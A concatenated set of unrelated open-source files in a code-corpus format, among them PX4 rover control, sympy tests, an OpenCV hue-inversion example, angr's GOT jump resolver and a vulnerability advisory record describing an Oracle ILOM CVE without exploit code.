float control_effort = euler_sp(2) / _param_max_turn_angle.get();
control_effort = math::constrain(control_effort, -1.0f, 1.0f);
_act_controls.control[actuator_controls_s::INDEX_YAW] = control_effort;
const float control_throttle = att_sp.thrust_body[0];
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = math::constrain(control_throttle, 0.0f, 1.0f);
}
void
RoverPositionControl::Run()
{
parameters_update(true);
/* run controller on gyro changes */
vehicle_angular_velocity_s angular_velocity;
if (_vehicle_angular_velocity_sub.update(&angular_velocity)) {
/* check vehicle control mode for changes to publication state */
vehicle_control_mode_poll();
attitude_setpoint_poll();
vehicle_attitude_poll();
manual_control_setpoint_poll();
_vehicle_acceleration_sub.update();
/* update parameters from storage */
parameters_update();
/* only run controller if position changed */
if (_local_pos_sub.update(&_local_pos)) {
/* load local copies */
_global_pos_sub.update(&_global_pos);
position_setpoint_triplet_poll();
// Convert Local setpoints to global setpoints
if (_control_mode.flag_control_offboard_enabled) {
if (!_global_local_proj_ref.isInitialized()
|| (_global_local_proj_ref.getProjectionReferenceTimestamp() != _local_pos.ref_timestamp)) {
_global_local_proj_ref.initReference(_local_pos.ref_lat, _local_pos.ref_lon,
_local_pos.ref_timestamp);
_global_local_alt0 = _local_pos.ref_alt;
}
_trajectory_setpoint_sub.update(&_trajectory_setpoint);
// local -> global
_global_local_proj_ref.reproject(
_trajectory_setpoint.x, _trajectory_setpoint.y,
_pos_sp_triplet.current.lat, _pos_sp_triplet.current.lon);
_pos_sp_triplet.current.alt = _global_local_alt0 - _trajectory_setpoint.z;
_pos_sp_triplet.current.valid = true;
}
// update the reset counters in any case
_pos_reset_counter = _global_pos.lat_lon_reset_counter;
matrix::Vector3f ground_speed(_local_pos.vx, _local_pos.vy, _local_pos.vz);
matrix::Vector2d current_position(_global_pos.lat, _global_pos.lon);
matrix::Vector3f current_velocity(_local_pos.vx, _local_pos.vy, _local_pos.vz);
if (!_control_mode.flag_control_manual_enabled && _control_mode.flag_control_position_enabled) {
if (control_position(current_position, ground_speed, _pos_sp_triplet)) {
//TODO: check if radius makes sense here
float turn_distance = _param_l1_distance.get(); //_gnd_control.switch_distance(100.0f);
// publish status
position_controller_status_s pos_ctrl_status{};
pos_ctrl_status.nav_roll = 0.0f;
pos_ctrl_status.nav_pitch = 0.0f;
pos_ctrl_status.nav_bearing = _gnd_control.nav_bearing();
pos_ctrl_status.target_bearing = _gnd_control.target_bearing();
pos_ctrl_status.xtrack_error = _gnd_control.crosstrack_error();
pos_ctrl_status.wp_dist = get_distance_to_next_waypoint(_global_pos.lat, _global_pos.lon,
_pos_sp_triplet.current.lat, _pos_sp_triplet.current.lon);
pos_ctrl_status.acceptance_radius = turn_distance;
pos_ctrl_status.yaw_acceptance = NAN;
pos_ctrl_status.timestamp = hrt_absolute_time();
_pos_ctrl_status_pub.publish(pos_ctrl_status);
}
} else if (!_control_mode.flag_control_manual_enabled && _control_mode.flag_control_velocity_enabled) {
_trajectory_setpoint_sub.update(&_trajectory_setpoint);
control_velocity(current_velocity);
}
}
// Respond to an attitude update and run the attitude controller if enabled
if (_control_mode.flag_control_attitude_enabled
&& !_control_mode.flag_control_position_enabled
&& !_control_mode.flag_control_velocity_enabled) {
control_attitude(_vehicle_att, _att_sp);
}
/* Only publish if any of the proper modes are enabled */
if (_control_mode.flag_control_velocity_enabled ||
_control_mode.flag_control_attitude_enabled ||
_control_mode.flag_control_position_enabled ||
_control_mode.flag_control_manual_enabled) {
// timestamp and publish controls
_act_controls.timestamp = hrt_absolute_time();
_actuator_controls_pub.publish(_act_controls);
vehicle_thrust_setpoint_s v_thrust_sp{};
v_thrust_sp.timestamp = hrt_absolute_time();
v_thrust_sp.xyz[0] = _act_controls.control[actuator_controls_s::INDEX_THROTTLE];
v_thrust_sp.xyz[1] = 0.0f;
v_thrust_sp.xyz[2] = 0.0f;
_vehicle_thrust_setpoint_pub.publish(v_thrust_sp);
vehicle_torque_setpoint_s v_torque_sp{};
v_torque_sp.timestamp = hrt_absolute_time();
v_torque_sp.xyz[0] = _act_controls.control[actuator_controls_s::INDEX_ROLL];
v_torque_sp.xyz[1] = _act_controls.control[actuator_controls_s::INDEX_PITCH];
v_torque_sp.xyz[2] = _act_controls.control[actuator_controls_s::INDEX_YAW];
_vehicle_torque_setpoint_pub.publish(v_torque_sp);
}
}
}
int RoverPositionControl::task_spawn(int argc, char *argv[])
{
RoverPositionControl *instance = new RoverPositionControl();
if (instance) {
_object.store(instance);
_task_id = task_id_is_work_queue;
if (instance->init()) {
return PX4_OK;
}
} else {
PX4_ERR("alloc failed");
}
delete instance;
_object.store(nullptr);
_task_id = -1;
return PX4_ERROR;
}
int RoverPositionControl::custom_command(int argc, char *argv[])
{
return print_usage("unknown command");
}
int RoverPositionControl::print_usage(const char *reason)
{
if (reason) {
PX4_WARN("%s\n", reason);
}
PRINT_MODULE_DESCRIPTION(
R"DESCR_STR(
### Description
Controls the position of a ground rover using an L1 controller.
Publishes `actuator_controls_0` messages at IMU_GYRO_RATEMAX.
### Implementation
Currently, this implementation supports only a few modes:
* Full manual: Throttle and yaw controls are passed directly through to the actuators
* Auto mission: The rover runs missions
* Loiter: The rover will navigate to within the loiter radius, then stop the motors
### Examples
CLI usage example:
$ rover_pos_control start
$ rover_pos_control status
$ rover_pos_control stop
)DESCR_STR");
PRINT_MODULE_USAGE_NAME("rover_pos_control", "controller");
PRINT_MODULE_USAGE_COMMAND("start")
PRINT_MODULE_USAGE_DEFAULT_COMMANDS();
return 0;
}
int rover_pos_control_main(int argc, char *argv[])
{
return RoverPositionControl::main(argc, argv);
}
| 7,544 |
8,323 | <filename>sympy/combinatorics/tests/test_util.py
from sympy.combinatorics.named_groups import SymmetricGroup, DihedralGroup,\
AlternatingGroup
from sympy.combinatorics.permutations import Permutation
from sympy.combinatorics.util import _check_cycles_alt_sym, _strip,\
_distribute_gens_by_base, _strong_gens_from_distr,\
_orbits_transversals_from_bsgs, _handle_precomputed_bsgs, _base_ordering,\
_remove_gens
from sympy.combinatorics.testutil import _verify_bsgs
def test_check_cycles_alt_sym():
perm1 = Permutation([[0, 1, 2, 3, 4, 5, 6], [7], [8], [9]])
perm2 = Permutation([[0, 1, 2, 3, 4, 5], [6, 7, 8, 9]])
perm3 = Permutation([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]])
assert _check_cycles_alt_sym(perm1) is True
assert _check_cycles_alt_sym(perm2) is False
assert _check_cycles_alt_sym(perm3) is False
def test_strip():
D = DihedralGroup(5)
D.schreier_sims()
member = Permutation([4, 0, 1, 2, 3])
not_member1 = Permutation([0, 1, 4, 3, 2])
not_member2 = Permutation([3, 1, 4, 2, 0])
identity = Permutation([0, 1, 2, 3, 4])
res1 = _strip(member, D.base, D.basic_orbits, D.basic_transversals)
res2 = _strip(not_member1, D.base, D.basic_orbits, D.basic_transversals)
res3 = _strip(not_member2, D.base, D.basic_orbits, D.basic_transversals)
assert res1[0] == identity
assert res1[1] == len(D.base) + 1
assert res2[0] == not_member1
assert res2[1] == len(D.base) + 1
assert res3[0] != identity
assert res3[1] == 2
def test_distribute_gens_by_base():
base = [0, 1, 2]
gens = [Permutation([0, 1, 2, 3]), Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1]), Permutation([3, 2, 1, 0])]
assert _distribute_gens_by_base(base, gens) == [gens,
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1])],
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2])]]
def test_strong_gens_from_distr():
strong_gens_distr = [[Permutation([0, 2, 1]), Permutation([1, 2, 0]),
Permutation([1, 0, 2])], [Permutation([0, 2, 1])]]
assert _strong_gens_from_distr(strong_gens_distr) == \
[Permutation([0, 2, 1]),
Permutation([1, 2, 0]),
Permutation([1, 0, 2])]
def test_orbits_transversals_from_bsgs():
S = SymmetricGroup(4)
S.schreier_sims()
base = S.base
strong_gens = S.strong_gens
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
result = _orbits_transversals_from_bsgs(base, strong_gens_distr)
orbits = result[0]
transversals = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert S.order() == order
def test_handle_precomputed_bsgs():
A = AlternatingGroup(5)
A.schreier_sims()
base = A.base
strong_gens = A.strong_gens
result = _handle_precomputed_bsgs(base, strong_gens)
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
assert strong_gens_distr == result[2]
transversals = result[0]
orbits = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert A.order() == order
def test_base_ordering():
base = [2, 4, 5]
degree = 7
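    # Base points 2, 4 and 5 are relabelled 0, 1 and 2; the remaining points
    # keep their natural order and fill positions 3..6.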
assert _base_ordering(base, degree) == [3, 4, 0, 5, 1, 2, 6]
def test_remove_gens():
S = SymmetricGroup(10)
base, strong_gens = S.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(S, base, new_gens) is True
A = AlternatingGroup(7)
base, strong_gens = A.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(A, base, new_gens) is True
D = DihedralGroup(2)
base, strong_gens = D.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(D, base, new_gens) is True
| 2,225 |
3,710 |
/*max@home*/
#include "twain.h"
#include "ttwain_state.h"
#include "ttwainP.h"
#include "ttwain_statePD.h"
#include "ttwain_util.h"
#ifdef __cplusplus
extern "C" {
#endif
extern void TTWAIN_SetState(TWAINSTATE status);
int TTWAIN_LoadSourceManagerPD(void) {
if (TTWAIN_GetState() >= TWAIN_SM_LOADED)
return TRUE; /* DSM already loaded */
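  /* DSM_Entry is resolved at link time here, so a non-null pointer simply
     confirms the Source Manager is linked into the binary. */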
TTwainData.DSM_Entry = DSM_Entry;
if (TTwainData.DSM_Entry != 0 /*kUnresolveCFragSymbolAddress*/) {
TTWAIN_SetAvailable(AVAIABLE_YES);
TTWAIN_SetState(TWAIN_SM_LOADED);
} else {
printf("DSM Entry NOT found !\n");
return FALSE;
}
return (TTWAIN_GetState() >= TWAIN_SM_LOADED);
}
int TTWAIN_UnloadSourceManagerPD(void) {
if (TTWAIN_GetState() == TWAIN_SM_LOADED) {
TTwainData.DSM_Entry = 0;
TTWAIN_SetState(TWAIN_PRESESSION);
}
return (TTWAIN_GetState() == TWAIN_PRESESSION);
}
/*-----------------------------------------------------------------------------*/
#ifdef __cplusplus
}
#endif
| 399 |
335 | {
"word": "Natter",
"definitions": [
"A casual and leisurely conversation."
],
"parts-of-speech": "Noun"
} | 59 |
304 | <reponame>ProfesseurGibaud/TestSite
from django.urls import path
# An alternative way is to use relative imports
from .views import hello
urlpatterns = [
path('', hello),
]
| 60 |
354 | {
"name": "speakeasy-nlp",
"description": "A simple natural language processor for node javascript.",
"homepage": "http://www.github.com/nhunzaker/speakeasy",
"keywords": [
"natural language"
],
"scripts": {
"format": "prettier --write lib/**/**/**.{js,md}",
"test": "vows"
},
"license": "MIT",
"author": "<NAME> <<EMAIL>>",
"repository": {
"type": "git",
"url": "git://github.com/nhunzaker/speakeasy.git"
},
"main": "index.js",
"version": "0.2.13",
"dependencies": {
"levenshtein": "*"
},
"devDependencies": {
"prettier": "^1.13.5",
"vows": "~0.8"
},
"prettier": {
"semi": false
}
}
| 293 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-mxp2-5233-73gr",
"modified": "2022-05-13T01:51:20Z",
"published": "2022-05-13T01:51:20Z",
"aliases": [
"CVE-2018-2566"
],
"details": "Vulnerability in the Integrated Lights Out Manager (ILOM) component of Oracle Sun Systems Products Suite (subcomponent: Remote Console Application). Supported versions that are affected are 3.x and 4.x. Difficult to exploit vulnerability allows low privileged attacker with network access via TLS to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized access to critical data or complete access to all Integrated Lights Out Manager (ILOM) accessible data. CVSS 3.0 Base Score 7.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N).",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"
}
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-2566"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/102603"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1040205"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "HIGH",
"github_reviewed": false
}
} | 689 |
313 | <reponame>gridgentoo/titus-control-plane<gh_stars>100-1000
/*
* Copyright 2018 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.common.util.rx;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.function.Supplier;
import rx.Observable;
import rx.Producer;
import rx.Scheduler;
import rx.Subscriber;
import rx.Subscription;
import rx.subscriptions.Subscriptions;
/**
 * See {@link ObservableExt#generatorFrom(Observable, long, long, TimeUnit, Scheduler)}.
*/
class PeriodicGenerator<T> {
private final Observable<T> sourceObservable;
private final Scheduler scheduler;
private final long initialDelayMs;
private final long intervalMs;
PeriodicGenerator(Observable<T> sourceObservable,
long initialDelay,
long interval,
TimeUnit timeUnit,
Scheduler scheduler) {
this.sourceObservable = sourceObservable;
this.scheduler = scheduler;
this.initialDelayMs = timeUnit.toMillis(initialDelay);
this.intervalMs = timeUnit.toMillis(interval);
}
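    // Each round (re)subscribes to sourceObservable and collects its emissions
    // into a single List<T>; the first round is delayed by initialDelayMs and
    // every later round by intervalMs (see doOne below).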
Observable<List<T>> doMany() {
return Observable.unsafeCreate(subscriber -> {
Subscription subscription = ObservableExt.generatorFrom(index -> doOne(index == 0), scheduler)
.flatMap(d -> d, 1)
.subscribe(new Subscriber<List<T>>() {
private Producer producer;
@Override
public void setProducer(Producer p) {
super.setProducer(p);
this.producer = p;
p.request(1);
}
@Override
public void onNext(List<T> item) {
subscriber.onNext(item);
producer.request(1);
}
@Override
public void onCompleted() {
subscriber.onCompleted();
}
@Override
public void onError(Throwable e) {
subscriber.onError(e);
}
}
);
subscriber.add(Subscriptions.create(subscription::unsubscribe));
});
}
private Observable<List<T>> doOne(boolean firstEmit) {
long delayMs = firstEmit ? initialDelayMs : intervalMs;
return Observable.timer(delayMs, TimeUnit.MILLISECONDS, scheduler).flatMap(tick -> sourceObservable).toList();
}
static <T> Observable<List<T>> from(Observable<T> sourceObservable,
long initialDelay,
long interval,
TimeUnit timeUnit,
Scheduler scheduler) {
return new PeriodicGenerator<>(sourceObservable, initialDelay, interval, timeUnit, scheduler).doMany();
}
}
| 2,005 |
1,350 | <reponame>Shashi-rk/azure-sdk-for-java<gh_stars>1000+
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.security.models;
import com.azure.core.annotation.Fluent;
import com.azure.core.util.logging.ClientLogger;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.annotation.JsonProperty;
/** IoT Security solution analytics severity metrics. */
@Fluent
public final class IoTSeverityMetrics {
@JsonIgnore private final ClientLogger logger = new ClientLogger(IoTSeverityMetrics.class);
/*
* Count of high severity alerts/recommendations.
*/
@JsonProperty(value = "high")
private Long high;
/*
* Count of medium severity alerts/recommendations.
*/
@JsonProperty(value = "medium")
private Long medium;
/*
* Count of low severity alerts/recommendations.
*/
@JsonProperty(value = "low")
private Long low;
/**
* Get the high property: Count of high severity alerts/recommendations.
*
* @return the high value.
*/
public Long high() {
return this.high;
}
/**
* Set the high property: Count of high severity alerts/recommendations.
*
* @param high the high value to set.
* @return the IoTSeverityMetrics object itself.
*/
public IoTSeverityMetrics withHigh(Long high) {
this.high = high;
return this;
}
/**
* Get the medium property: Count of medium severity alerts/recommendations.
*
* @return the medium value.
*/
public Long medium() {
return this.medium;
}
/**
* Set the medium property: Count of medium severity alerts/recommendations.
*
* @param medium the medium value to set.
* @return the IoTSeverityMetrics object itself.
*/
public IoTSeverityMetrics withMedium(Long medium) {
this.medium = medium;
return this;
}
/**
* Get the low property: Count of low severity alerts/recommendations.
*
* @return the low value.
*/
public Long low() {
return this.low;
}
/**
* Set the low property: Count of low severity alerts/recommendations.
*
* @param low the low value to set.
* @return the IoTSeverityMetrics object itself.
*/
public IoTSeverityMetrics withLow(Long low) {
this.low = low;
return this;
}
/**
* Validates the instance.
*
* @throws IllegalArgumentException thrown if the instance is not valid.
*/
public void validate() {
}
}
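// Illustrative usage (not part of the generated file): the with* setters return
// `this`, so the severity counts can be populated fluently:
//
//     IoTSeverityMetrics metrics = new IoTSeverityMetrics().withHigh(5L).withMedium(2L).withLow(0L);
//     metrics.validate(); // currently a no-op: none of the properties are required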
| 1,006 |
4,036 |
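import ast
from collections import namedtuple

# Stand-ins for types defined elsewhere in the original project (an assumption,
# added so the snippet below is self-contained and runnable):
Alias = namedtuple('Alias', 'name asname')
Import = namedtuple('Import', 'aliases flags')
FromImport = namedtuple('FromImport', 'level module aliases flags')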
def original(the_ast):
def walk(node, in_function, in_name_main):
def flags():
return in_function * 2 + in_name_main
if isinstance(node, ast.Module):
for import_node in walk(node.body, in_function, in_name_main):
yield import_node
elif isinstance(node, ast.ImportFrom):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield FromImport(node.level, node.module, aliases, flags())
elif isinstance(node, ast.Import):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield Import(aliases, flags())
elif isinstance(node, ast.FunctionDef):
for _, child in ast.iter_fields(node):
for import_node in walk(child, True, in_name_main):
yield import_node
elif isinstance(node, list):
for n in node:
for import_node in walk(n, in_function, in_name_main):
yield import_node
return list(walk(the_ast, False, False))
def similar_1(the_ast):
def walk(node, in_function, in_name_main):
def flags():
return in_function * 2 + in_name_main
if isinstance(node, ast.Module):
for import_node in walk(node.body, in_function, in_name_main):
yield import_node
elif isinstance(node, ast.ImportFrom):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield FromImport(node.level, node.module, aliases, flags())
elif isinstance(node, ast.Import):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield Import(aliases, flags())
elif isinstance(node, ast.FunctionDef):
for _, child in ast.iter_fields(node):
for import_node in walk(child, True, in_name_main):
yield import_node
return list(walk(the_ast, False, False))
def similar_2(the_ast):
def walk(node, in_function, in_name_main):
def flags():
return in_function * 2 + in_name_main
if isinstance(node, ast.Module):
for import_node in walk(node.body, in_function, in_name_main):
yield import_node
elif isinstance(node, ast.Import):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield Import(aliases, flags())
elif isinstance(node, ast.FunctionDef):
for _, child in ast.iter_fields(node):
for import_node in walk(child, True, in_name_main):
yield import_node
elif isinstance(node, list):
for n in node:
for import_node in walk(n, in_function, in_name_main):
yield import_node
return list(walk(the_ast, False, False))
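# Example (assuming the stand-in types above):
#   original(ast.parse("import os"))
#   -> [Import(aliases=[Alias(name='os', asname=None)], flags=0)]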
| 1,333 |
2,830 | <reponame>nitikagarw/openwhisk<filename>ansible/files/auth_design_document_for_subjects_db_v2.0.0.json<gh_stars>1000+
{
"_id": "_design/subjects.v2.0.0",
"views": {
"identities": {
"map": "function (doc) {\n if (doc.namespaces && !doc.blocked) {\n doc.namespaces.forEach(function(namespace) {\n var v = {_id: namespace.name + '/limits', namespace: namespace.name, uuid: namespace.uuid, key: namespace.key};\n emit([namespace.name], v);\n emit([namespace.uuid, namespace.key], v);\n });\n }\n}"
}
},
"language": "javascript",
"indexes": {}
}
| 249 |
2,151 | /*
* Copyright (c) 2014 The Native Client Authors. All rights reserved.
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
#include <string.h>
#include "native_client/tests/pnacl_dynamic_loading/test_pso.h"
static int var = 2345;
/* Zero-initialized variables go in the BSS. Test a large BSS. */
static char bss_var[BSS_VAR_SIZE];
static int example_func(int *ptr) {
return *ptr + 1234;
}
static int *get_var(void) {
/* Test use of -fPIC by getting an address. */
return &var;
}
/*
* Test use of LLVM's memcpy intrinsic inside a PSO. (Clang will compile
* calls to memcpy() to uses of LLVM's memcpy intrinsic.)
*/
static void *memcpy_example(void *dest, const void *src, size_t size) {
return memcpy(dest, src, size);
}
/*
* Test use of 64-bit division. For a 32-bit architecture, this will call
* a function such as __divdi3, so this tests that such a function gets
* linked in if needed.
*/
static int64_t division_example(int64_t a, int64_t b) {
return a / b;
}
struct test_pso_root __pnacl_pso_root = {
example_func,
get_var,
bss_var,
memcpy_example,
division_example,
};
| 414 |
2,542 | <reponame>gridgentoo/ServiceFabricAzure
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#pragma once
namespace LBSimulator
{
class FM;
class DataGenerator
{
DENY_COPY(DataGenerator)
public:
static std::wstring GetMetricName(int metricIndex);
DataGenerator(FM & fm, int seed, Reliability::LoadBalancingComponent::PLBConfig & plbConfig);
void Parse(std::wstring const & fileName);
void Generate();
private:
static std::wstring const MetricCountStr;
static std::wstring const NodeCountStr;
static std::wstring const FaultDomainsStr;
static std::wstring const PartitionCountStr;
static std::wstring const ReplicaCountPerPartitionStr;
static std::wstring const NodeCapacityRatioRangeStr;
static std::wstring const NodeCapacityRangeStr;
static std::wstring const PrimaryLoadRangeStr;
static std::wstring const SecondaryLoadRangeStr;
static std::wstring const AffinitizedServicePairStr;
int MetricCount;
int NodeCount;
std::vector<Common::Uri> FaultDomains;
std::vector<int> PartitionCount;
std::vector<int> ReplicaCountPerPartition;
std::vector<LoadDistribution> NodeCapacityRange;
std::vector<LoadDistribution> PrimaryLoadRange;
std::vector<LoadDistribution> SecondaryLoadRange;
int AffinitizedServicePair;
int ReplicaCountPerAffinitizedService;
void ReadIntVec(std::wstring & line, std::vector<int> & vecInt);
void ReadLoadInputVec(std::wstring & line, std::vector<LoadDistribution> & vecLoad);
void GenerateNodes();
void GenerateServices();
void GenerateFailoverUnits();
void GeneratePlacements();
        void GenerateService(int serviceIndex, int partitionCount, int replicaCount, std::wstring affinitizedService);
void GenerateFailoverUnit(int failoverUnitIndex, int serviceIndex, int replicaCount);
FM & fm_;
Common::Random random_;
Reliability::LoadBalancingComponent::PLBConfig & config_;
};
}
| 842 |
3,482 | #include <opencv2/core.hpp>
#include <opencv2/highgui.hpp>
#include <iostream>
#include <math.h>
// BGR -> HSV
cv::Mat BGR2HSV(cv::Mat img){
// get height and width
int width = img.cols;
int height = img.rows;
float r, g, b;
float h, s, v;
float _max, _min;
// prepare output
cv::Mat hsv = cv::Mat::zeros(height, width, CV_32FC3);
// each y, x
for (int y = 0; y < height; y++){
for (int x = 0; x < width; x++){
// BGR -> HSV
r = (float)img.at<cv::Vec3b>(y, x)[2] / 255;
g = (float)img.at<cv::Vec3b>(y, x)[1] / 255;
b = (float)img.at<cv::Vec3b>(y, x)[0] / 255;
_max = fmax(r, fmax(g, b));
_min = fmin(r, fmin(g, b));
// get Hue
if(_max == _min){
h = 0;
} else if (_min == b) {
h = 60 * (g - r) / (_max - _min) + 60;
} else if (_min == r) {
h = 60 * (b - g) / (_max - _min) + 180;
} else if (_min == g) {
h = 60 * (r - b) / (_max - _min) + 300;
}
// get Saturation
s = _max - _min;
// get Value
v = _max;
hsv.at<cv::Vec3f>(y, x)[0] = h;
hsv.at<cv::Vec3f>(y, x)[1] = s;
hsv.at<cv::Vec3f>(y, x)[2] = v;
}
}
return hsv;
}
// HSV -> BGR
cv::Mat HSV2BGR(cv::Mat hsv){
// get height and width
int width = hsv.cols;
int height = hsv.rows;
float h, s, v;
double c, _h, _x;
double r, g, b;
// prepare output
cv::Mat out = cv::Mat::zeros(height, width, CV_8UC3);
// each y, x
for (int y = 0; y < height; y++){
for (int x = 0; x < width; x++){
h = hsv.at<cv::Vec3f>(y, x)[0];
s = hsv.at<cv::Vec3f>(y, x)[1];
v = hsv.at<cv::Vec3f>(y, x)[2];
c = s;
_h = h / 60;
            _x = c * (1 - fabs(fmod(_h, 2) - 1));
r = g = b = v - c;
if (_h < 1) {
r += c;
g += _x;
} else if (_h < 2) {
r += _x;
g += c;
} else if (_h < 3) {
g += c;
b += _x;
} else if (_h < 4) {
g += _x;
b += c;
} else if (_h < 5) {
r += _x;
b += c;
} else if (_h < 6) {
r += c;
b += _x;
}
out.at<cv::Vec3b>(y, x)[0] = (uchar)(b * 255);
out.at<cv::Vec3b>(y, x)[1] = (uchar)(g * 255);
out.at<cv::Vec3b>(y, x)[2] = (uchar)(r * 255);
}
}
return out;
}
// invert hue: rotate H by 180 degrees (e.g. red <-> cyan), leaving S and V unchanged
cv::Mat inverse_hue(cv::Mat hsv){
int height = hsv.rows;
int width = hsv.cols;
for(int y = 0; y < height; y++){
for(int x = 0; x < width; x++){
hsv.at<cv::Vec3f>(y, x)[0] = fmod(hsv.at<cv::Vec3f>(y, x)[0] + 180, 360);
}
}
return hsv;
}
int main(int argc, const char* argv[]){
// read image
cv::Mat img = cv::imread("imori.jpg", cv::IMREAD_COLOR);
// BGR -> HSV
cv::Mat hsv = BGR2HSV(img);
// Inverse Hue
hsv = inverse_hue(hsv);
// Gray -> Binary
cv::Mat out = HSV2BGR(hsv);
//cv::imwrite("out.jpg", out);
cv::imshow("sample", out);
cv::waitKey(0);
cv::destroyAllWindows();
return 0;
}
| 1,572 |
6,132 | <reponame>matthewpruett/angr<filename>angr/analyses/cfg/indirect_jump_resolvers/amd64_elf_got.py
import logging
from capstone.x86_const import X86_REG_RIP
from pyvex.stmt import IMark
from .resolver import IndirectJumpResolver
l = logging.getLogger(name=__name__)
class AMD64ElfGotResolver(IndirectJumpResolver):
def __init__(self, project):
super().__init__(project, timeless=True)
def filter(self, cfg, addr, func_addr, block, jumpkind):
if jumpkind != "Ijk_Call":
return False
return True
def resolve(self, cfg, addr, func_addr, block, jumpkind):
# Find the address and size of the last instruction
last_insn_addr = None
last_insn_size = None
for stmt in reversed(block.statements):
if isinstance(stmt, IMark):
last_insn_addr = stmt.addr
last_insn_size = stmt.len
break
if last_insn_addr is None:
# Cannot find the last instruction
return False, [ ]
# lift one instruction
insn = self.project.factory.block(last_insn_addr, size=last_insn_size).capstone.insns[-1]
opnd = insn.insn.operands[0]
# Must be of the form: call [rip + 0xABCD]
if not (opnd.mem and opnd.mem.disp and opnd.mem.base == X86_REG_RIP and not opnd.mem.index):
return False, [ ]
disp = insn.insn.disp
slot = disp + insn.address + insn.size
target = cfg._fast_memory_load_pointer(slot)
if target is None:
l.warning("Address %# is not mapped.", slot)
return False, [ ]
if not self.project.is_hooked(target):
return False, [ ]
dest = self.project.hooked_by(target)
l.debug("Resolved target to %s", dest.display_name)
return True, [target]
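# Illustrative arithmetic (addresses are made up): for `call qword ptr [rip + 0x2fe2]`
# encoded in 6 bytes at 0x401020, the GOT slot is
#   slot = disp + insn.address + insn.size = 0x2fe2 + 0x401020 + 6 = 0x404008,
# and the pointer stored there must be a hooked (SimProcedure) address for the
# call to resolve.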
| 837 |
526 | /* SPDX-License-Identifier: Apache-2.0 */
/* Copyright Contributors to the ODPi Egeria project. */
package org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.typedefs;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.InstanceStatus;
import org.testng.annotations.Test;
import java.util.*;
import static org.testng.Assert.*;
/**
* TypeDefPatchTest provides test of TypeDefPatch
*/
public class TypeDefPatchTest
{
private String typeDefGUID = "TestTypeDefGUID";
private String typeDefName = "TestTypeDefName";
private long applyToVersion = 5L;
private long updateToVersion = 6L;
private String newVersionName = "TestNewVersionName";
private String description = "TestDescription";
private String descriptionGUID = "TestDescriptionGUID";
private List<TypeDefAttribute> typeDefAttributes = new ArrayList<>();
private Map<String, String> typeDefOptions = new HashMap<>();
private List<ExternalStandardMapping> externalStandardMappings = new ArrayList<>();
private List<InstanceStatus> validInstanceStatusList = new ArrayList<>();
private InstanceStatus initialStatus = InstanceStatus.APPROVED;
private List<TypeDefLink> validEntityDefs = new ArrayList<>(); // ClassificationDefs
private RelationshipEndDef endDef1 = new RelationshipEndDef(); // RelationshipDefs
private RelationshipEndDef endDef2 = new RelationshipEndDef(); // RelationshipDefs
public TypeDefPatchTest()
{
TypeDefAttribute attribute = new TypeDefAttribute();
attribute.setAttributeName("TestAttributeName");
attribute.setAttributeDescription("TestAttributeDescription");
typeDefAttributes.add(attribute);
typeDefOptions.put("TestOptionName", "TestOptionValue");
ExternalStandardMapping mapping = new ExternalStandardMapping();
mapping.setStandardName("TestStandardName");
